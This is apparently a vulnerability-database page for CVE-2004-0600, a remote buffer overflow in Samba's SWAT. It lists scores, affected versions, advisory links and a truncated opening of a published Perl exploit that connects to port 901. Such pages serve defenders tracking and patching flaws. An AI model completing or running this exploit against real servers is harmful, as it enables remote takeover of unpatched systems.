Published: 27/07/2004 Updated: 11/10/2017

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote malicious users to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.

Vulnerable Product	Search on Vulmon	Subscribe to Product
samba samba 3.0.2
samba samba 3.0.2a
samba samba 3.0.3
samba samba 3.0.4
trustix secure linux 2.0
trustix secure linux 2.1
trustix secure linux 1.5

Synopsis samba security update Type/Severity Security Advisory: Important Topic Updated samba packages that fix buffer overflows, as well as other variousbugs, are now available Description Samba provides file and printer sharing services to SMB/CIFS clients Evgeny Demidov discovered a f ...

#!/usr/bin/perl # Samba 304 and prior's SWAT Authorization Buffer Overflow # Created by Noam Rathaus of Beyond Security Ltd # use IO::Socket; use strict; my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" ); unless ($remote) { die "cannot connect to http daemon on $host ...

NVD-CWE-Other http://www.redhat.com/support/errata/RHSA-2004-259.html http://www.gentoo.org/security/en/glsa/glsa-200407-21.xml http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:071 http://www.novell.com/linux/security/advisories/2004_22_samba.html http://www.trustix.org/errata/2004/0039/http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000851 http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000854 http://marc.info/?l=bugtraq&m=109052647928375&w=2 http://marc.info/?l=bugtraq&m=109052891507263&w=2 http://marc.info/?l=bugtraq&m=109053195818351&w=2 http://marc.info/?l=bugtraq&m=109051533021376&w=2 http://marc.info/?l=bugtraq&m=109051340810458&w=2 https://exchange.xforce.ibmcloud.com/vulnerabilities/16785 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11445 https://access.redhat.com/errata/RHSA-2004:259 https://nvd.nist.gov https://www.exploit-db.com/exploits/364/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2004-0600

Vulnerability Summary

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect